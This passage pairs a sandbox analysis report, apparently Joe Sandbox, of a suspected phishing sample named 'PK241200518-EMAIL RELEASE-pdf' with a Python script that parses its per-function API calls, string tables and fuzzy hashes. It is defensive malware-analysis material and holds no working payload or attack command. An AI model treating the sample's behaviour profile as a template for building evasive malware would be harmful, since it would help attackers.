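• Opcode Fuzzy Hash: e1aa3530324bc9d580effc32c9271d4a864e160e203e9cd749df1b2533ea505d
• Instruction Fuzzy Hash: 5A419235101544DEDB215F28DC88BF93B65FB07332F158266FE668A1E2C77A8C46DB21
APIs
• CharLowerBuffW.USER32(?,?,007DF910), ref: 007BA90B
• GetDriveTypeW.KERNEL32(00000061,008089A0,00000061), ref: 007BA9D5
• _wcscpy.LIBCMT ref: 007BA9FF
Strings
Memory Dump Source
• Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
Similarity
• API ID: BuffCharDriveLowerType_wcscpy
• String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
• API String ID: 2820617543-1000479233
• Opcode Fuzzy Hash: 441899b11ab6ea769bfa650bff08afe2aa0ad1b5348297b07d3aef1d5b35208b
• Instruction Fuzzy Hash: 64519F31508301EBC704EF14C896BEFB7A5FF84740F15882DF995972A2DB79A909CA93
"""

# "<Name>.<MODULE>(<args>), ref: <hex>"  or  "<Name>.<MODULE> ref: <hex>" (no argument list),
# optionally prefixed with the caller when the report marks the call as part of a subcall.
API_RE = re.compile(r"^(?:Part of subcall function ([0-9A-Fa-f]+): )?"
                    r"(.+?)\.([A-Za-z0-9_]+)(?:\((.*)\))?,? ref: ([0-9A-Fa-f]+)$")
SECTIONS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}


@dataclass
class ApiCall:
    name: str
    module: str
    args: list                      # raw argument tokens as printed ('?' = unknown)
    ref: int                        # address of the call site
    subcall_of: Optional[int] = None  # caller address for "Part of subcall function" lines


@dataclass
class FunctionRecord:
    apis: list = field(default_factory=list)
    source_file: str = ""
    similarity: dict = field(default_factory=dict)

    def api_names(self):
        return sorted({c.name for c in self.apis})

    def strings(self):
        """The report joins the function's string table with '$'."""
        value = self.similarity.get("String ID", "")
        return value.split("$") if value else []

    def api_string_id(self):
        """'<api hash>-<string hash>'; the string half is 0 when there are no strings."""
        api_hash, string_hash = self.similarity["API String ID"].split("-")
        return int(api_hash), int(string_hash)


def parse_records(text):
    records, current, section = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if line in SECTIONS:
            if line == "APIs":            # in this extract each record starts with its APIs block
                current = FunctionRecord()
                records.append(current)
            section = line
            continue
        if current is None or not line.startswith("•"):
            continue
        body = line.lstrip("•").strip()
        if section == "APIs":
            m = API_RE.match(body)
            if m:
                caller, name, module, args, ref = m.groups()
                current.apis.append(ApiCall(name, module, args.split(",") if args else [],
                                            int(ref, 16), int(caller, 16) if caller else None))
        elif section == "Memory Dump Source" and body.startswith("Source File:"):
            current.source_file = body[len("Source File:"):].split(",")[0].strip()
        elif section == "Similarity" and ":" in body:
            key, _, value = body.partition(":")
            current.similarity[key.strip()] = value.strip()
    return records


def index_by_opcode_hash(records):
    """Key records on the Opcode Fuzzy Hash to match functions across reports."""
    return {r.similarity["Opcode Fuzzy Hash"]: r for r in records if "Opcode Fuzzy Hash" in r.similarity}


def callers_of(records, api_name):
    """Records whose API list contains api_name (e.g. every function touching GetDriveTypeW)."""
    return [r for r in records if any(c.name == api_name for c in r.apis)]


if __name__ == "__main__":
    for rec in parse_records(SAMPLE):
        print(rec.api_names(), rec.strings(), rec.api_string_id())
```

Run stand-alone, the script prints one line per record with its API names, string table and API String ID pair. The string table of the second record (all, cdrom, fixed, network, ramdisk, removable, unknown) is the set of drive types accepted by AutoIt's DriveGetDrive(), which is the kind of signal the parsed string lists make easy to spot when separating AutoIt runtime functions from the script's own logic.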
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: __i64tow__itow__swprintf
                                                                                                          • String ID: %.15g$0x%p$False$True
                                                                                                          • API String ID: 421087845-2263619337
                                                                                                          • Opcode ID: 23b577f664f10cf0a3de67514add231d98ddc002c6651ec1683c7c421b6e28ac
                                                                                                          • Instruction ID: faf92a13d6551fc70448290028197e1342bbfcd0d5f9f3803153ed567aefbd52
                                                                                                          • Opcode Fuzzy Hash: 23b577f664f10cf0a3de67514add231d98ddc002c6651ec1683c7c421b6e28ac
                                                                                                          • Instruction Fuzzy Hash: A741B771600205EEDB24EF74D845EB673E8FF46310F2444BEE949D7291EA79A9458B10
                                                                                                          APIs
                                                                                                          • _memset.LIBCMT ref: 007D716A
                                                                                                          • CreateMenu.USER32 ref: 007D7185
                                                                                                          • SetMenu.USER32(?,00000000), ref: 007D7194
                                                                                                          • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 007D7221
                                                                                                          • IsMenu.USER32(?), ref: 007D7237
                                                                                                          • CreatePopupMenu.USER32 ref: 007D7241
                                                                                                          • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 007D726E
                                                                                                          • DrawMenuBar.USER32 ref: 007D7276
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                                                                                                          • String ID: 0$F
                                                                                                          • API String ID: 176399719-3044882817
                                                                                                          • Opcode ID: 7c13e300206251cecd59774d33f645273c02f190b0b4ad11b710455793471cbc
                                                                                                          • Instruction ID: ae578aefd4406960c6f3b7b52d919e36ac448fb0ddddb92e91a7177ebfb2d035
                                                                                                          • Opcode Fuzzy Hash: 7c13e300206251cecd59774d33f645273c02f190b0b4ad11b710455793471cbc
                                                                                                          • Instruction Fuzzy Hash: 62415B74A01209EFDB24DF64D984EDA7BB9FF49310F14412AF94697361E735A920CF90
                                                                                                          APIs
                                                                                                          • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 007D755E
                                                                                                          • CreateCompatibleDC.GDI32(00000000), ref: 007D7565
                                                                                                          • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 007D7578
                                                                                                          • SelectObject.GDI32(00000000,00000000), ref: 007D7580
                                                                                                          • GetPixel.GDI32(00000000,00000000,00000000), ref: 007D758B
                                                                                                          • DeleteDC.GDI32(00000000), ref: 007D7594
                                                                                                          • GetWindowLongW.USER32(?,000000EC), ref: 007D759E
                                                                                                          • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 007D75B2
                                                                                                          • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 007D75BE
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                                                                          • String ID: static
                                                                                                          • API String ID: 2559357485-2160076837
                                                                                                          • Opcode ID: 074ff3340f71a4b782b1469b9616f083abd09f1e2a336d36a71f52834ab7194d
                                                                                                          • Instruction ID: 84025f77232c9a7240643ff8633fe14836536b4c6b183e3be059b45728b42646
                                                                                                          • Opcode Fuzzy Hash: 074ff3340f71a4b782b1469b9616f083abd09f1e2a336d36a71f52834ab7194d
                                                                                                          • Instruction Fuzzy Hash: 73318F31105218FBDF159F64EC08FDA3B79FF09321F118226FA16A22A0D739D821DB64
                                                                                                          APIs
                                                                                                          • _memset.LIBCMT ref: 00776E3E
                                                                                                            • Part of subcall function 00778B28: __getptd_noexit.LIBCMT ref: 00778B28
                                                                                                          • __gmtime64_s.LIBCMT ref: 00776ED7
                                                                                                          • __gmtime64_s.LIBCMT ref: 00776F0D
                                                                                                          • __gmtime64_s.LIBCMT ref: 00776F2A
                                                                                                          • __allrem.LIBCMT ref: 00776F80
                                                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00776F9C
                                                                                                          • __allrem.LIBCMT ref: 00776FB3
                                                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00776FD1
                                                                                                          • __allrem.LIBCMT ref: 00776FE8
                                                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00777006
                                                                                                          • __invoke_watson.LIBCMT ref: 00777077
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                                                                                          • String ID:
                                                                                                          • API String ID: 384356119-0
                                                                                                          • Opcode ID: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
                                                                                                          • Instruction ID: b72a48ae43ca26d461aba0910cee8dccf7a46b542525b49dd912a3011e500386
                                                                                                          • Opcode Fuzzy Hash: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
                                                                                                          • Instruction Fuzzy Hash: BB71D776A40B17EBDF18AE68DC45B5AB3A4BF047A4F14C529F518D6281F7B8D900C790
                                                                                                          APIs
                                                                                                          • _memset.LIBCMT ref: 007B2542
                                                                                                          • GetMenuItemInfoW.USER32(00815890,000000FF,00000000,00000030), ref: 007B25A3
                                                                                                          • SetMenuItemInfoW.USER32(00815890,00000004,00000000,00000030), ref: 007B25D9
                                                                                                          • Sleep.KERNEL32(000001F4), ref: 007B25EB
                                                                                                          • GetMenuItemCount.USER32(?), ref: 007B262F
                                                                                                          • GetMenuItemID.USER32(?,00000000), ref: 007B264B
                                                                                                          • GetMenuItemID.USER32(?,-00000001), ref: 007B2675
                                                                                                          • GetMenuItemID.USER32(?,?), ref: 007B26BA
                                                                                                          • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 007B2700
                                                                                                          • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 007B2714
                                                                                                          • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 007B2735
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                                                                                          • String ID:
                                                                                                          • API String ID: 4176008265-0
                                                                                                          • Opcode ID: 6d5c7ad479b3fab094497a6bbd6b41e278f687914628762fed3eb0703ccf3348
                                                                                                          • Instruction ID: 5058d847a21915b3517a7c8f7414cc1dd2e8bf593dd8541c4d14e2439ad5c783
                                                                                                          • Opcode Fuzzy Hash: 6d5c7ad479b3fab094497a6bbd6b41e278f687914628762fed3eb0703ccf3348
                                                                                                          • Instruction Fuzzy Hash: A961A170902249EFDB21CF64DC88EFE7BB8FB45308F144459E95293252DB39AD16DB21
                                                                                                          APIs
                                                                                                          • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 007D6FA5
                                                                                                          • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 007D6FA8
                                                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 007D6FCC
                                                                                                          • _memset.LIBCMT ref: 007D6FDD
                                                                                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 007D6FEF
                                                                                                          • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 007D7067
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
Similarity
• API ID: MessageSend$LongWindow_memset
• String ID:
• API String ID: 830647256-0
APIs
• SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 007A6BBF
• SafeArrayAllocData.OLEAUT32(?), ref: 007A6C18
• VariantInit.OLEAUT32(?), ref: 007A6C2A
• SafeArrayAccessData.OLEAUT32(?,?), ref: 007A6C4A
• VariantCopy.OLEAUT32(?,?), ref: 007A6C9D
• SafeArrayUnaccessData.OLEAUT32(?), ref: 007A6CB1
• VariantClear.OLEAUT32(?), ref: 007A6CC6
• SafeArrayDestroyData.OLEAUT32(?), ref: 007A6CD3
• SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 007A6CDC
• VariantClear.OLEAUT32(?), ref: 007A6CEE
• SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 007A6CF9
Similarity
• API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
• String ID:
• API String ID: 2706829360-0
APIs
• WSAStartup.WSOCK32(00000101,?), ref: 007C5793
• inet_addr.WSOCK32(?,?,?), ref: 007C57D8
• gethostbyname.WSOCK32(?), ref: 007C57E4
• IcmpCreateFile.IPHLPAPI ref: 007C57F2
• IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 007C5862
• IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 007C5878
• IcmpCloseHandle.IPHLPAPI(00000000), ref: 007C58ED
• WSACleanup.WSOCK32 ref: 007C58F3
Strings
Similarity
• API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
• String ID: Ping
• API String ID: 1028309954-2246546115
APIs
• SetErrorMode.KERNEL32(00000001), ref: 007BB4D0
• GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 007BB546
• GetLastError.KERNEL32 ref: 007BB550
• SetErrorMode.KERNEL32(00000000,READY), ref: 007BB5BD
Strings
Similarity
• API ID: Error$Mode$DiskFreeLastSpace
• String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
• API String ID: 4194297153-14809454
APIs
  • Part of subcall function 00757DE1: _memmove.LIBCMT ref: 00757E22
  • Part of subcall function 007AAA99: GetClassNameW.USER32(?,?,000000FF), ref: 007AAABC
• SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 007A9014
• GetDlgCtrlID.USER32 ref: 007A901F
• GetParent.USER32 ref: 007A903B
• SendMessageW.USER32(00000000,?,00000111,?), ref: 007A903E
• GetDlgCtrlID.USER32(?), ref: 007A9047
• GetParent.USER32(?), ref: 007A9063
• SendMessageW.USER32(00000000,?,?,00000111), ref: 007A9066
Strings
Similarity
• API ID: MessageSend$CtrlParent$ClassName_memmove
• String ID: ComboBox$ListBox
• API String ID: 1536045017-1403004172
APIs
  • Part of subcall function 00757DE1: _memmove.LIBCMT ref: 00757E22
  • Part of subcall function 007AAA99: GetClassNameW.USER32(?,?,000000FF), ref: 007AAABC
• SendMessageW.USER32(?,00000186,00000002,00000000), ref: 007A90FD
• GetDlgCtrlID.USER32 ref: 007A9108
• GetParent.USER32 ref: 007A9124
• SendMessageW.USER32(00000000,?,00000111,?), ref: 007A9127
• GetDlgCtrlID.USER32(?), ref: 007A9130
• GetParent.USER32(?), ref: 007A914C
• SendMessageW.USER32(00000000,?,?,00000111), ref: 007A914F
Strings
Similarity
• API ID: MessageSend$CtrlParent$ClassName_memmove
• String ID: ComboBox$ListBox
• API String ID: 1536045017-1403004172
APIs
• GetParent.USER32 ref: 007A916F
• GetClassNameW.USER32(00000000,?,00000100), ref: 007A9184
• _wcscmp.LIBCMT ref: 007A9196
• SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 007A9211
Strings
Similarity
• API ID: ClassMessageNameParentSend_wcscmp
• String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
• API String ID: 1704125052-3381328864
APIs
• SafeArrayGetVartype.OLEAUT32(00000000,?), ref: 007B7A6C
Similarity
• API ID: ArraySafeVartype
• String ID:
• API String ID: 1725837607-0
                                                                                                          • Opcode ID: c5d0a526f950509a824d455d8c40a27caf7062574e57f4d37a30dbc5b00b07aa
                                                                                                          • Instruction ID: a94f41a3a69fb887debbd8eaa166fad238ed3e84e87f1902485f167ca4bdf87a
                                                                                                          • Opcode Fuzzy Hash: c5d0a526f950509a824d455d8c40a27caf7062574e57f4d37a30dbc5b00b07aa
                                                                                                          • Instruction Fuzzy Hash: 54B16F71904219DFDB14DFA4C885BFEBBB8EF89321F244429E941E7251D778E941CBA0
APIs
• GetCurrentThreadId.KERNEL32 ref: 007B11F0
• GetForegroundWindow.USER32(00000000,?,?,?,?,?,007B0268,?,00000001), ref: 007B1204
• GetWindowThreadProcessId.USER32(00000000), ref: 007B120B
• AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,007B0268,?,00000001), ref: 007B121A
• GetWindowThreadProcessId.USER32(?,00000000), ref: 007B122C
• AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,007B0268,?,00000001), ref: 007B1245
• AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,007B0268,?,00000001), ref: 007B1257
• AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,007B0268,?,00000001), ref: 007B129C
• AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,007B0268,?,00000001), ref: 007B12B1
• AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,007B0268,?,00000001), ref: 007B12BC
Similarity
• API ID: Thread$AttachInput$Window$Process$CurrentForeground
• String ID:
• API String ID: 2156557900-0
• Opcode ID: 03991d7ba1e812c945364890cbf995920dfe34d81cd6e0b79951c1cb6ab36420
• Instruction ID: a1e39778aabe25224b75a48deb8329287c977060c9739b6934e251edaed5422d
• Opcode Fuzzy Hash: 03991d7ba1e812c945364890cbf995920dfe34d81cd6e0b79951c1cb6ab36420
• Instruction Fuzzy Hash: F1318D75701204BBDB10DF54EC98BEA77BEFF59311F918126F901C61A0EB789E418B64
APIs
• mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 0075FAA6
• OleUninitialize.OLE32(?,00000000), ref: 0075FB45
• UnregisterHotKey.USER32(?), ref: 0075FC9C
• DestroyWindow.USER32(?), ref: 007945D6
• FreeLibrary.KERNEL32(?), ref: 0079463B
• VirtualFree.KERNEL32(?,00000000,00008000), ref: 00794668
Strings
Similarity
• API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
• String ID: close all
• API String ID: 469580280-3243417748
• Opcode ID: 07de0297355225762ea93d3d7079823e7672bbc367f76dc758ce2246f5e8f161
• Instruction ID: 16db613f86096549af010aa056d3d467b315c1e3686061e433005ff0e78aec91
• Opcode Fuzzy Hash: 07de0297355225762ea93d3d7079823e7672bbc367f76dc758ce2246f5e8f161
• Instruction Fuzzy Hash: CEA17E70701212CFCB19EF14D999EA9F364BF05701F5482ADED0AAB261DB78AD16CF90
APIs
Strings
Similarity
• API ID: Variant$ClearInit$_memset
• String ID: ,,~$Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
• API String ID: 2862541840-1439926319
• Opcode ID: 2198e2d0159187d56eecedf29e9eca8bbfb9b1f35f9b0cc73bb8ee4461aafb9e
• Instruction ID: a07b42a16fd641d2c15f61e575e4dbcd0c8f90695a386776aec1753d3bc4fde4
• Opcode Fuzzy Hash: 2198e2d0159187d56eecedf29e9eca8bbfb9b1f35f9b0cc73bb8ee4461aafb9e
• Instruction Fuzzy Hash: 64916A71A00219EBDF64DFA5C848FAEBBB8EF45710F10815DFA15AB280D7789945CBA0
APIs
• EnumChildWindows.USER32(?,007AA439), ref: 007AA377
Strings
Similarity
• API ID: ChildEnumWindows
• String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
• API String ID: 3555792229-1603158881
• Opcode ID: b12335f083956ba3184308b8a706caf6923312ed85c0bc614b5a941e5bdc0d46
• Instruction ID: f16a582e4ffcbe417f9a235a15f6f8df6d62928e33d5a7f56d3aefe892d27d2c
• Opcode Fuzzy Hash: b12335f083956ba3184308b8a706caf6923312ed85c0bc614b5a941e5bdc0d46
• Instruction Fuzzy Hash: 2C91B431A00606FACF08DFA0C446BEEFB74FF85340F54C219D859A7191DB3969A9DBA1
APIs
• SetWindowLongW.USER32(?,000000EB), ref: 00752EAE
  • Part of subcall function 00751DB3: GetClientRect.USER32(?,?), ref: 00751DDC
  • Part of subcall function 00751DB3: GetWindowRect.USER32(?,?), ref: 00751E1D
  • Part of subcall function 00751DB3: ScreenToClient.USER32(?,?), ref: 00751E45
• GetDC.USER32 ref: 0078CD32
• SendMessageW.USER32(?,00000031,00000000,00000000), ref: 0078CD45
• SelectObject.GDI32(00000000,00000000), ref: 0078CD53
• SelectObject.GDI32(00000000,00000000), ref: 0078CD68
• ReleaseDC.USER32(?,00000000), ref: 0078CD70
• MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 0078CDFB
Strings
Similarity
• API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
• String ID: U
• API String ID: 4009187628-3372436214
• Opcode ID: 96e2be540e6325173903efb2daa563b7025defd575773e15b9c36b65278a8e1d
• Instruction ID: 2b0bf049db3ab864c5f867ea52497abbb0387e00a7784d74509522f9aa2134ba
• Opcode Fuzzy Hash: 96e2be540e6325173903efb2daa563b7025defd575773e15b9c36b65278a8e1d
• Instruction Fuzzy Hash: 3A71D231500205DFCF26AF64CC89AEA7BB5FF49321F18827AED555A2A6C7388C45DB70
APIs
• InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 007C1A50
• HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 007C1A7C
• InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 007C1ABE
• InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 007C1AD3
• HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 007C1AE0
• HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 007C1B10
• InternetCloseHandle.WININET(00000000), ref: 007C1B57
  • Part of subcall function 007C2483: GetLastError.KERNEL32(?,?,007C1817,00000000,00000000,00000001), ref: 007C2498
  • Part of subcall function 007C2483: SetEvent.KERNEL32(?,?,007C1817,00000000,00000000,00000001), ref: 007C24AD
Strings
Similarity
• API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorEventHandleInfoLastOpenSend
• String ID:
• API String ID: 2603140658-3916222277
• Opcode ID: 68d83abd078a0e68f80bd4c6572564dfba528f0bcfdae8af7ef678ce0c25f768
• Instruction ID: a547edca6889e14f97b5cc010311e7c79c0f76b3ba41de33a16764331ffddc7a
• Opcode Fuzzy Hash: 68d83abd078a0e68f80bd4c6572564dfba528f0bcfdae8af7ef678ce0c25f768
• Instruction Fuzzy Hash: 4E416FB1501618BFEB119F60CC89FFE7BACEF09354F44812EF9059A142E7789E449BA4
APIs
• GetModuleFileNameW.KERNEL32(?,?,00000104,?,007DF910), ref: 007C8D28
• FreeLibrary.KERNEL32(00000000,00000001,00000000,?,007DF910), ref: 007C8D5C
• QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 007C8ED6
• SysFreeString.OLEAUT32(?), ref: 007C8F00
Similarity
• API ID: Free$FileLibraryModuleNamePathQueryStringType
• String ID:
• API String ID: 560350794-0
• Opcode ID: e1db8fb759fa8e56013c341655f455ae468c037e60c37c45aad89806f88f81d0
• Instruction ID: 8155ba4838b4ec91fe8d77c6876870a607c5bcf948b40cd62ad6ed97f1719310
• Opcode Fuzzy Hash: e1db8fb759fa8e56013c341655f455ae468c037e60c37c45aad89806f88f81d0
• Instruction Fuzzy Hash: ECF12871A00209EFCB54DF94C888EAEB7B9FF49315F10849CF906AB251DB35AE45CB61
APIs
• _memset.LIBCMT ref: 007CF6B5
• GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 007CF848
• GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 007CF86C
• GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 007CF8AC
• GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 007CF8CE
• CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 007CFA4A
• GetLastError.KERNEL32(00000000,00000001,00000000), ref: 007CFA7C
• CloseHandle.KERNEL32(?), ref: 007CFAAB
• CloseHandle.KERNEL32(?), ref: 007CFB22
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                                                                                          • String ID:
                                                                                                          • API String ID: 4090791747-0
